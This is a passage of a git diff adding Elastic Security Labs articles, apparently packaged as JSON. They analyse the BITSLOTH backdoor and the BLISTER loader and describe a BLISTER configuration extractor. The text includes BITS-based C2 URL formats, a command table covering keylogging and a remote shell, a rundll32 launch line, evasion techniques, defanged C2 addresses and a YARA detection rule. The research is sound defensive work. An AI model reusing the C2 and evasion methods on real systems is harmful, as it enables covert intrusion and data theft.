Within this project, the malware developer chose notable terminology– referring to BITSLOTH as the ```Slaver``` component and the command and control server as the ```Master``` component. Below is an example of one of the PDB file paths linked to BITSLOTH that depicts this:\n\n\n\nBITSLOTH employs no obfuscation around control flow or any kind of string encryption.\n\n\n\nBoth older and recent samples contain strings used for logging and debugging purposes. As an example at startup, there is a string referenced in the read-only section (```.rdata```). \n\n \n\nThis Simplified Chinese wide-character string translates to:\n```Note: There is already a program running, do not run it again…```\n\n\n\nThese small snippets contained within BITSLOTH help shed light on the development and prioritization of features, along with what appear to be operator instructions. In the latest version, a new scheduling component was added by the developer to control specific times when BITSLOTH should operate in a victim environment. This is a feature we have observed in other modern malware families such as [EAGERBEE](https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set).\n\n\n\n## BITSLOTH code analysis\n\nBITSLOTH is a backdoor with many different capabilities including:\n\n - Running and executing commands\n - Uploading and downloading files\n - Performing enumeration and discovery \n - Collecting sensitive data through keylogging and screen capturing\n\n### Mutex\n\nBITSLOTH uses a hard-coded mutex (```Global\\d5ffff77ff77adad657658```) within each sample to ensure only one instance is running at a time. \n\n\n\n### Communication\n\nBITSLOTH adopts a traditional client/server architecture, the developer refers to the client as the ```Slaver``` component and the command and control server (C2) as the ```Master``` component. The developer embeds the IP/port of the C2 server in each sample with a front-loaded string (```rrrr_url```). This string acts as a key to identify the C2 configuration in itself while running in memory, this is used when updating the C2 server.\n\nBelow are the configurations in several samples our team has observed, the threat actor configures both internal and external IP ranges.\n\n```\nrrrr_url216.238.121[.]132:8443\nrrrr_url192.168.1[.]125:8443 \nrrrr_url192.168.1[.]124:8443\nrrrr_url45.116.13[.]178:443\n```\n\nOne of the defining features of BITSLOTH is using the [Background Intelligent Transfer Service](https://learn.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) (BITS) for C2. While this feature has been designed to facilitate the network transfer of files between two machines, it’s been [abused](https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/) by multiple state-sponsored groups and continues to fly under the radar against organizations. This medium is appealing to adversaries because many organizations still struggle to monitor BITS network traffic and detect unusual BITS jobs.\n\n> Windows has a system administration feature called Background Intelligent Transfer Service (BITS) enabling the download and upload of files to HTTP web servers or SMB shares. The BITS service employs multiple features during the file transfer process such as the ability to pause/resume transfers, handling network interruptions, etc. BITS traffic is usually associated with software updates therefore wrongfully implied as trusted. Many organizations lack visibility into BITS network traffic making this an appealing target.\n\nThe BITS API is exposed through Window’s [Component Object Model](https://learn.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal) (COM) using the **IBackgroundCopyManager** [interface](https://learn.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager). This interface provides capabilities to create new jobs, enumerate existing jobs in the transfer queue, and access a specific job from a transfer queue.\n\n\n\nAfter initialization, BITSLOTH cancels any existing BITS jobs on the victim machine that match the following display names:\n\n - ```WU Client Download```\n - ```WU Client Upload```\n - ```WU Client Upload R```\n\nThese names are used by the developer to blend in and associate the different BITS transfer jobs with their respective BITS [job type](https://learn.microsoft.com/en-us/windows/win32/api/bits/ne-bits-bg_job_type). By canceling any existing jobs, this allows the execution of the malware to operate from a clean state.\n\n\n\nBelow are the Microsoft definitions matching the type of BITS job:\n\n - **BG_JOB_TYPE_DOWNLOAD** - Specifies that the job downloads files to the client.\n - **BG_JOB_TYPE_UPLOAD** - Specifies that the job uploads a file to the server.\n - **BG_JOB_TYPE_UPLOAD_REPLY** - Specifies that the job uploads a file to the server, and receives a reply file from the server application.\n\nAfter canceling any existing jobs, the MAC address and operating system information are retrieved and placed into global variables. A new thread gets created, configuring the auto-start functionality. Within this thread, a new BITS download job is created with the name (```Microsoft Windows```).\n\n\n\nThis download job sets the destination URL to ```http://updater.microsoft[.]com/index.aspx```. While this domain is not routable, BITSLOTH masquerades this BITS job using a benign looking domain as a cover then uses **SetNotifyCmdLine** to execute the malware when the transfer state is changed.\n\n\n\nInterestingly, this unique toolmark allowed us to pivot to additional samples showing this family has been in circulation for several years. \n \n\n\nAt this point, the malware has now been configured with persistence via a BITS job named ```Microsoft Windows```. Below is a screenshot of this job’s configuration showing the notification command line set to the BITSLOTH location (```C:\\ProgramData\\Media\\setup_wm.exe```)\n\n\n\nOnce BITSLOTH becomes active, it will start requesting instructions from the C2 server using the ```WU Client Download``` job. This request URL is generated by combining the MAC address with a hard-coded string (```wu.htm```). Below is an example URL:\n\n```\nhttps://192.168.182.130/00-0C-29-0E-29-87/wu.htm\n```\n\nIn response to this request, the malware will then receive a 12-byte structure from the C2 server containing a unique ID for the job, command ID for the handler, and a response token. Throughout these exchanges of file transfers, temporary files from the victim machine are used as placeholders to hold the data being transmitted back and forth, BITSLOTH uses a filename starting with characters (```wm```) appended by random characters.\n\n\n\n\n### Command functionality\n\nBITSLOTH uses a command handler with 35 functions to process specific actions that should be taken on the victim machine. The malware has the option to be configured with HTTP or HTTPS and uses a hardcoded single byte XOR (```0x2```) to obfuscate the incoming instructions from the C2 server. The outbound requests containing the collected victim data have no additional protections by the malware itself and are sent in plaintext. \n\nIn order to move fast, our team leveraged a helpful Python [implementation](https://github.com/SafeBreach-Labs/SimpleBITSServer) of a BITS server released by [SafeBreach Labs](https://www.safebreach.com/). By setting the C2 IP to our loopback address inside a VM, this allowed us to get introspection on the network traffic. \n\n\n\nThe handlers all behave in a similar approach performing a primary function then writing the data returned from the handler to a local temporary file. These temporary files then get mapped to a BITS upload job called ```WU Client Upload```. Each handler uses its own string formatting to create a unique destination URL. Each filename at the end of the URL uses a single letter to represent the type of data collected from the host, such as ```P.bin``` for processes or ```S.bin``` for services.\n\n```\nhttp://192.168.182.130/00-0C-29-0E-29-87/IF/P.bin\n```\n\nBelow is an example screenshot showing the process enumeration handler with the string formatting and how this data is then linked to the BITS upload job.\n\n\n\nThis link to the exfiltrated data can also be observed by viewing the BITS upload job directly. In the screenshots below, we can see the destination URL (C2 server) for the upload and the temporary file (```wm9F0C.tmp```) linked to the job.\n\n\n\nIf we look at the temporary file, we can see the collected process information from the victim host.\n\n\n\nSoon after the upload job is created, the data is sent over the network through a BITS_POST request containing the captured data.\n\n\n\n### Command handling table\n\n| Command ID | Description |\n| ----- | ----- |\n| 0 | Collect running processes via **WTSEnumerateProcessesW** |\n| 1 | Get Windows services via **EnumServicesStatusW** |\n| 2 | Get system information via ```systeminfo``` command |\n| 3 | Retrieve all top-level Windows via **EnumWindows** |\n| 5 | Collect file listings |\n| 6 | Download file from C2 server |\n| 7 | Upload file to C2 server |\n| 10 | Terminate itself |\n| 11 | Set communication mode to HTTPS |\n| 12 | Set communication mode to HTTP |\n| 13 | Remove persistence |\n| 14 | Reconfigure persistence |\n| 15 | Cancel BITS download job (```WU Client Download```) |\n| 16 | Remove persistence and delete itself |\n| 17 | Thread configuration |\n| 18 | Duplicate of handler #2 |\n| 19 | Delete file based on file path |\n| 20 | Delete folder based on file path |\n| 21 | Starts terminal shell using stdin/stdout redirection |\n| 22 | Resets terminal handler (#21) |\n| 23 | Runs Windows tree command |\n| 24 | Updates BITSLOTH, delete old version |\n| 25 | Shutdown the machine via **ExitWindowsEx** |\n| 26 | Reboot the machine via **ExitWindowsEx** |\n| 27 | Log user off from the machine via **ExitWindowsEx** |\n| 28 | Terminate process based on process identifier (PID) |\n| 29 | Retrieves additional information via ```msinfo32``` command |\n| 30 | Execute individual file via **ShellExecuteW** |\n| 34 | Create new directory via **CreateDirectoryW** |\n| 41 | Upload data to C2 server | \n| 42 | Checks for capture driver via **capGetDriverDescriptionW** |\n| 43 | Take screenshots of victim machine desktop |\n| 44 | Record keystrokes from victim machine |\n| 45 | Stop recording screenshot images |\n| 46 | Stop keylogger functionality |\n\n### Backdoor functionality\n\nBITSLOTH includes a wide range of post-compromise capabilities for an adversary to operate within a victim environment. We will focus on the more significant capabilities by grouping them into different categories.\n\n#### Discovery/enumeration\n\nA portion of the BITSLOTH handlers are focused on retrieving and enumerating data from victim machines. This includes:\n\n - Retrieving process information via **WTSEnumerateProcessesW**\n - Collecting Windows services via **EnumServicesStatusW**\n - Enumerating all top-level Windows via **EnumWindows** with a callback function\n - Retrieving system information via windows utilities such as ```systeminfo``` and ```msinfo32```\n\n\n\nIn many of the handlers, the locale version is configured to ```chs ```(Chinese - Simplified).\n\n\n\nBITSLOTH has a couple custom enumeration functions tied to retrieving file listings and performing directory tree searches. The file listing handler takes a custom parameter from the operator to target specific folder locations of interest:\n\n - **GET_DESKDOP** → **CSIDL_DESKTOPDIRECTORY** (Desktop)\n - **GET_BITBUCKET** -> **CSIDL_BITBUCKET** (Recycle Bin)\n - **GET_PERSONAl** -> **CSIDL_MYDOCUMENTS** (My Documents)\n\n\n\nBITSLOTH also has the ability to collect entire directory/file listings on the machine for every file by using the Windows [tree](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tree) utility. This handler loops across the alphabet for each drive letter where the data is then saved locally in a temporary file named ```aghzyxklg```. \n\n\n\nThe tree data is then compressed and sent to the C2 server with a .ZIP extension. Below is an example of the collected data. This data can help pinpoint sensitive files or provide more context about the target environment. \n\n\n\n#### Collection\n\nIn terms of collection, there are a few handlers used for actively gathering information. These are centered around capturing screenshots from the desktop and performing keylogging functionality.\n\nBITSLOTH implements a lightweight function used to identify capture recording devices, this appears to be a technique to check for a camera using the Windows API (**capGetDriverDescriptionW**). \n\n\n\nBITSLOTH has the ability to take screenshots based on parameters provided by the operator. Input to this function uses a separator (```||```) where the operator provides the number of seconds of the capture interval and the capture count. The images are stored as BMP files with a hard coded name ```ciakfjoab``` and compressed with the DEFLATE algorithm using a ```.ZIP``` archive. These timestamped zipped archives are then sent out to the C2 server.\n\nThe handler leverages common screenshot APIs such as **CreateCompatibleBitmap** and **BitBlt** from ```Gdi32.dll```.\n\n\n\nFor recording keystrokes, BITSLOTH uses traditional techniques by monitoring key presses using **GetAsyncKeyState**/**GetKeyState**. The handler has an argument for the number of seconds to perform the keylogging. This data is also compressed in a ```.ZIP``` file and sent outbound to the C2 server.\n\n\n\n#### Execution / Maintenance\n\nBITSLOTH has multiple capabilities around maintenace and file execution as well as standard backdoor functionalities such as:\n\n - Capability to execute files stand-alone via **ShellExecuteW**\n - Windows terminal capability to execute commands and read data back via pipes\n - Create directories, perform reboots, shutdown the machine, terminate processes\n - Perform file upload and download between C2 server\n - Modify BITSLOTH configuration such as communication modes, update C2 URL, turn off keylogging/screenshot features\n\n\n\n## BITSLOTH pivots\n\nBITSLOTH appears to be actively deployed. We identified another BITSLOTH C2 server (```15.235.132[.]67```) using the same port (```8443```) with the same [SSL certificate](https://www.shodan.io/search?query=ssl.cert.serial%3A253c1c0bbf58e1f509fc4468de462ed8872f81d9) used from our intrusion. \n\n\n\nWhile it’s not exactly clear who’s behind BITSLOTH, there was a large amount of activity of VirusTotal uploads occurring on December 12, 2021. With around 67 uploads over 24 hours from one submitter (```1fcc35ea```), we suspect someone linked to this project was validating detections, making modifications, and uploading different versions of BITSLOTH to VirusTotal. One sample was packed with VMProtect, others stripped of functionality, some uploads were debug builds, etc.\n\n\n\nA lot of time has passed since then, but it is interesting seeing this family show up in a recent intrusion. Whatever the objective behind this malware, it's surprising that this family remained under the radar for so many years.\n\n\n\n### REF 8747 through MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n[h4] Tactics\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n - [Collection](https://attack.mitre.org/tactics/TA0009/)\n - [Command and Control](https://attack.mitre.org/tactics/TA0011/)\n - [Discovery](https://attack.mitre.org/tactics/TA0007/)\n - [Execution](https://attack.mitre.org/tactics/TA0002/)\n - [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n - [Persistence](https://attack.mitre.org/tactics/TA0003/)\n \n#### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n\n - [BITS Jobs](https://attack.mitre.org/techniques/T1197/)\n - [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n - [Hijack Execution Flow: DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/)\n - [Screen Capture](https://attack.mitre.org/techniques/T1113/)\n - [Input Capture: Keylogging](https://attack.mitre.org/techniques/T1056/001/)\n - [Proxy](https://attack.mitre.org/techniques/T1090/)\n\n## Detecting REF8747\n\n### Detection\n\nThe following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:\n\n - [Persistence via BITS Job Notify Cmdline](https://github.com/elastic/endpoint-rules/blob/0f01f1a9e2ac08e9ead74cafd4d73cb8166f9fc8/rules/windows/persistence_execution_via_bits_setnotifycmdline_method.toml)\n - [LSASS Access Attempt via PPL Bypass](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_lsass_access_attempt_via_ppl_bypass.toml)\n - [LSASS Access Attempt from an Unsigned Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_lsass_access_attempt_from_an_unsigned_executable.toml)\n - [Suspicious Parent-Child Relationship](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_suspicious_parent_child_relationship.toml)\n - [Credential Access via Known Utilities](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_credential_access_via_known_utilities.toml)\n - Shellcode Injection\n\n#### YARA Signatures\n\n - [Windows.Hacktool.Mimikatz](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Mimikatz.yar)\n - [Windows.Trojan.BITSloth](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_BITSloth.yar)\n - [Windows.Hacktool.Iox](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Iox.yar)\n - [Windows.Hacktool.Rubeus](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Rubeus.yar)\n - [Windows.Hacktool.Certify](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Certify.yar)\n - [Windows.Hacktool.RingQ](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_RingQ.yar)\n - [Windows.Hacktool.GodPotato](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_GodPotato.yar)\n - [Multi.Hacktool.Stowaway](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Stowaway.yar)\n\n#### YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify BITSLOTH:\n\n```\nrule Windows_Trojan_BITSLOTH_05fc3a0a {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-07-16\"\n last_modified = \"2024-07-18\"\n os = \"Windows\"\n arch = \"x86\"\n threat_name = \"Windows.Trojan.BITSLOTH\"\n \t license = \"Elastic License v2\"\n\n strings:\n $str_1 = \"/%s/index.htm?RspID=%d\" wide fullword\n $str_2 = \"/%s/%08x.rpl\" wide fullword\n $str_3 = \"/%s/wu.htm\" wide fullword\n $str_4 = \"GET_DESKDOP\" wide fullword\n $str_5 = \"http://updater.microsoft.com/index.aspx\" wide fullword\n $str_6 = \"[U] update error...\" wide fullword\n $str_7 = \"RMC_KERNEL ...\" wide fullword\n $seq_global_protocol_check = { 81 3D ?? ?? ?? ?? F9 03 00 00 B9 AC 0F 00 00 0F 46 C1 }\n $seq_exit_windows = { 59 85 C0 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A 02 EB ?? 56 EB }\n condition:\n 2 of them\n}\n```\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/bitsloth) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n| ----- | ----- | ----- | ----- |\n| 4a4356faad620bf12ff53bcfac62e12eb67783bd22e66bf00a19a4c404bf45df | SHA-256 | ```s.dll``` | BITSLOTH |\n| dfb76bcf5a3e29225559ebbdae8bdd24f69262492eca2f99f7a9525628006d88 | SHA-256 | ```125.exe``` | BITSLOTH |\n| 4fb6dd11e723209d12b2d503a9fcf94d8fed6084aceca390ac0b7e7da1874f50 | SHA-256 | ```setup_wm.exe``` | BITSLOTH |\n| 0944b17a4330e1c97600f62717d6bae7e4a4260604043f2390a14c8d76ef1507 | SHA-256 | ```1242.exe``` | BITSLOTH |\n| 0f9c0d9b77678d7360e492e00a7fa00af9b78331dc926b0747b07299b4e64afd | SHA-256 | ```setup_wm.exe``` | BITSLOTH (VMProtect) |\n| 216.238.121[.]132 | ipv4-addr | BITSLOTH C2 server |\n| 45.116.13[.]178 | ipv4-addr | BITSLOTH C2 server |\n| 15.235.132[.]67 | ipv4-addr | BITSLOTH C2 server |\n| http ://updater.microsoft.com/index.aspx | | | BITSLOTH file indicator |\n| updater.microsoft.com | | | BITSLOTH file indicator |\n\n## References\nThe following were referenced throughout the above research:\n\n - [https://github.com/SafeBreach-Labs/SimpleBITSServer/tree/master](https://github.com/SafeBreach-Labs/SimpleBITSServer/tree/master)\n - [https://github.com/T4y1oR/RingQ](https://github.com/T4y1oR/RingQ)\n - [https://github.com/EddieIvan01/iox](https://github.com/EddieIvan01/iox)\n - [https://github.com/ph4ntonn/Stowaway/](https://github.com/ph4ntonn/Stowaway/)\n\n## About Elastic Security Labs\n\nElastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.\n\nFollow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). "
+ },
+ "title": "BITS and Bytes: Analyzing BITSLOTH, a newly identified backdoor",
+ "slug": "bits-and-bytes-analyzing-bitsloth",
+ "date": "2024-08-01",
+ "description": "Elastic Security Labs identified a novel Windows backdoor leveraging the Background Intelligent Transfer Service (BITS) for C2. This malware was found during a recent activity group tracked as REF8747.",
+ "author": [
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "Security Labs Images 29.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ]
+ },
+ "id": "security_labs_content-bits_and_bytes_analyzing_bitsloth-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_configuration_extractor-md.json
new file mode 100644
index 00000000000..f33b4b554a1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_configuration_extractor-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BLISTER Configuration Extractor\"\nslug: \"blister-configuration-extractor\"\ndate: \"2022-12-06\"\ndescription: \"Python script to extract the configuration and payload from BLISTER samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - blister\n - ref7890\n---\n\nPython script to extract the configuration and payload from BLISTER samples.\n\n[Download blister-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9bce8a0e1a513bd5/62882db13b9b8554904a4baa/blister-config-extractor.tar.gz)\n\n## Getting Started\n\nThis tool provides a Python module and command line tool that will extract configurations from the BLISTER malware loader and dump the results to screen.\n\n> For information on the BLISTER malware loader and campaign observations, check out our blog posts detailing this:\n>\n> - [BLISTER Campaign Analysis](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign)\n> - [BLISTER Malware Analysis](https://www.elastic.co/security-labs/blister-loader)\n\n### Docker\n\nWe can easily run the extractor with Docker, first we need to build the image:\n\n```\ndocker build . -t blister-config-extractor\n```\n\nThen we run the container with the **-v** flag to map a host directory to the docker container directory:\n\n```\ndocker run -ti --rm -v \\\n\"$(pwd)/binaries\":/binaries blister-config-extractor:latest -d /binaries/\n\n```\n\nWe can either specify a single sample with **-f** option or a directory of samples with **-d**.\n\n\n\n### Running it Locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nblister-config-extractor -h\n\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n\n## References\n\n- Customised Rabbit cipher implementation based on [Rabbit-Cipher](https://github.com/Robin-Pwner/Rabbit-Cipher/)\n"
+ },
+ "title": "BLISTER Configuration Extractor",
+ "slug": "blister-configuration-extractor",
+ "date": "2022-12-06",
+ "description": "Python script to extract the configuration and payload from BLISTER samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "blister",
+ "ref7890"
+ ]
+ },
+ "id": "security_labs_content-blister_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_loader-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_loader-md.json
new file mode 100644
index 00000000000..bc4b3eaef75
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-blister_loader-md.json
@@ -0,0 +1,34 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"BLISTER Loader\"\nslug: \"blister-loader\"\ndate: \"2023-04-13\"\ndescription: \"The BLISTER loader continues to be actively used to load a variety of malware.\"\nauthor:\n - slug: cyril-francois\n - slug: daniel-stepanic\n - slug: salim-bitam\nimage: \"blog-thumb-power-lines.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - blister\n - malware\n---\n\n## Key Takeaways\n\n- BLISTER is a loader that continues to stay under the radar, actively being used to load a variety of malware including clipbankers, information stealers, trojans, ransomware, and shellcode\n- In-depth analysis shows heavy reliance of Windows Native API’s, several injection capabilities, multiple techniques to evade detection, and counter static/dynamic analysis\n- Elastic Security is providing a configuration extractor that can be used to identify key elements of the malware and dump the embedded payload for further analysis\n- 40 days after the initial reporting on the BLISTER loader by Elastic Security, we observed a change in the binary to include additional architectures. This shows that this is an actively developed tool and the authors are watching defensive countermeasures\n\n> For information on the BLISTER malware loader and campaign observations, check out our blog post and configuration extractor detailing this:\n>\n> - [BLISTER Campaign Analysis](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign)\n> - [BLISTER Configuration Extractor](https://www.elastic.co/security-labs/blister-configuration-extractor)\n\n## Overview\n\nThe Elastic Security team has continually been monitoring the BLISTER loader since our initial [release](https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign) at the end of last year. This family continues to remain largely unnoticed, with low detection rates on new samples.\n\n\n\nA distinguishing characteristic of BLISTER’s author is their method of tampering with legitimate DLLs to bypass static analysis. During the past year, Elastic Security has observed the following legitimate DLL’s patched by BLISTER malware:\n\n| Filename | Description |\n| -------------- | ------------------------------------------------------------------ |\n| dxgi.dll | DirectX Graphics Infrastructure |\n| WIAAut.DLL | WIA Automation Layer |\n| PowerCPL.DLL | Power Options Control Panel |\n| WIMGAPI.DLL | Windows Imaging Library |\n| rdpencom.dll | RDPSRAPI COM Objects |\n| colorui.dll | Microsoft Color Control Panel. |\n| termmgr.dll | Microsoft TAPI3 Terminal Manager |\n| libcef.dll | Chromium Embedded Framework (CEF) Dynamic Link Library |\n| CEWMDM.DLL | Windows CE WMDM Service Provider |\n| intl.dll | LGPLed libintl for Windows NT/2000/XP/Vista/7 and Windows 95/98/ME |\n| vidreszr.dll | Windows Media Resizer |\n| sppcommdlg.dll | Software Licensing UI API |\n\nDue to the way malicious code is embedded in an otherwise benign application, BLISTER may be challenging for technologies that rely on some forms of machine learning. Combined with code-signing defense evasion, BLISTER appears designed with security technologies in mind.\n\nOur research shows that BLISTER is actively developed and has been [linked](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=0422_Socgholish) in public reporting to [LockBit](https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit) ransomware and the [SocGholish](https://redcanary.com/threat-detection-report/threats/socgholish/) framework; in addition, Elastic has also observed BLISTER in relation to the following families: [Amadey](https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey), [BitRAT](https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat), [Clipbanker](https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker), [Cobalt Strike](https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike), [Remcos](https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos), and [Raccoon](https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon) along with others.\n\nIn this post, we will explain how BLISTER continues to operate clandestinely, highlight the loader’s core capabilities (injection options, obfuscation, and anti-analysis tricks) as well as provide a configuration extractor that can be used to dump BLISTER embedded payloads.\n\nConsider the following [sample](https://www.virustotal.com/gui/file/afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2) representative of BLISTER for purposes of this analysis. This sample was also used to develop the initial BLISTER family YARA signature, the configuration extraction script, and evaluate tools against against unknown x32 and x64 BLISTER samples.\n\n## Execution Flow\n\nThe execution flow consists of the following phases:\n\n- Deciphering the second stage\n- Retrieving configuration and packed payload\n- Payload unpacking\n- Persistence mechanisms\n- Payload injection\n\n### Launch / Entry Point\n\nDuring the first stage of the execution flow, BLISTER is embedded in a legitimate version of the [colorui.dll](https://www.virustotal.com/gui/file/1068e40851b243a420cb203993a020d0ba198e1ec6c4d95f0953f81e13046973/details) library. The threat actor, with a previously achieved foothold, uses the Windows built-in rundll32.exe utility to load BLISTER by calling the export function **LaunchColorCpl** :\n\n```\nRundll32 execution arguments\n\nrundll32.exe \"BLISTER.dll,LaunchColorCpl\"\n```\n\nThe image below demonstrates how BLISTER’s DLL is modified, noting that the export start is patched with a function call (line 17) to the malware entrypoint.\n\n\n\nIf we compare one of these malicious loaders to the original DLL they masquerade as, we can see where the patch was made, the function no longer exists:\n\n\n\n### Deciphering Second Stage\n\nBLISTER’s second stage is ciphered in its [resource section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-rsrc-section) (.rsrc).\n\nThe deciphering routine begins with a loop based sleep to evade detection:\n\n\n\nBLISTER then enumerates and hashes each export of ntdll, comparing export names against loaded module names; searching specifically for the **NtProtectVirtualMemory** API:\n\n\n\nFinally, it looks for a memory region of 100,832 bytes by searching for a specific memory pattern, beginning its search at the return address and leading us in the .rsrc section. When found, BLISTER performs an eXclusive OR (XOR) operation on the memory region with a four-byte key, sets it’s page protection to PAGE_EXECUTE_READ with a call to NtProtectVirtualMemory, and call its second stage entry point with the deciphering key as parameter:\n\n\n\n### Obfuscation\n\nBLISTER’s second-stage involves obfuscating functions, scrambling their control flow by splitting their basic blocks with unconditional jumps and randomizing basic blocks’ locations. An example of which appears below.\n\n\n\nBLISTER inserts junk code into basic blocks as yet another form of defense evasion, as seen below.\n\n\n\n### Retrieving Configuration and Packed Payload\n\nBLISTER uses the previous stage’s four-byte key to locate and decipher its configuration.\n\nThe routine begins by searching its memory, beginning at return address, for its four-byte key XORed with a hardcoded value as memory pattern:\n\n\n\nWhen located, the 0x644 byte configuration is copied and XOR-decrypted with the same four-byte key:\n\n\n\nFinally, it returns a pointer to the beginning of the packed PE, which is after the 0x644 byte blob:\n\n\n\nSee the [configuration structure](https://www.elastic.co/security-labs/blister-loader#configuration-structure) in the appendix.\n\n### Time Based Anti Debug\n\nAfter loading the configuration, and depending if the **kEnableSleepBasedAntiDebug** flag (0x800) is set, BLISTER calls its time-based anti-debug function:\n\n\n\nThis function starts by creating a thread with the Sleep Windows function as a starting address and 10 minutes as the argument:\n\n\n\nThe main thread will sleep using **NtDelayExecution** until the sleep thread has exited:\n\n\n\nFinally the function returns 0 when the sleep thread has run at least for 9 1/2 minutes:\n\n\n\nIf not, the function will return 1 and the process will be terminated:\n\n\n\n### Windows API\n\n#### Blister’s GetModuleHandle\n\nBLISTER implements its own **GetModuleHandle** to evade detection, the function takes the library name hash as a parameter, iterates over the process [PEB LDR](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data)’s modules and checks the hashed module’s name against the one passed in the parameter:\n\n\n\n#### Blister’s GetProcAddress\n\nBLISTER’s **GetProcAddress** takes the target DLL and the export hash as a parameter, it also takes a flag that tells the function that the library is 64 bits.\n\nThe DLL can be loaded or mapped then the function iterates over the DLL’s export function names and compares their hashes with the ones passed in the parameter:\n\n\n\nIf the export is found, and its virtual address isn’t null, it is returned:\n\n\n\nElse the DLL is **LdrLoaded** and BLISTER’s **GetProcAddress** is called again with the newly loaded dll:\n\n\n\n#### Library Manual Mapping\n\nBLISTER manually maps a library using **NtCreateFile** in order to open a handle on the DLL file:\n\n\n\nNext it creates a section with the handle by calling **NtCreateSection** with the **SEC_IMAGE** attribute which tells Windows to loads the binary as a PE:\n\n\n\n_NtCreateSection used within mapping function_\n\nFinally it maps the section with **NtMapViewOfSection** :\n\n\n\n#### x32/x64 Ntdll Mapping\n\nFollowing the call to its anti-debug function, BLISTER manually maps 32 bit and 64 bit versions of NTDLL.\n\nIt starts by mapping the x32 version:\n\n\n\nThen it disables [SysWOW64 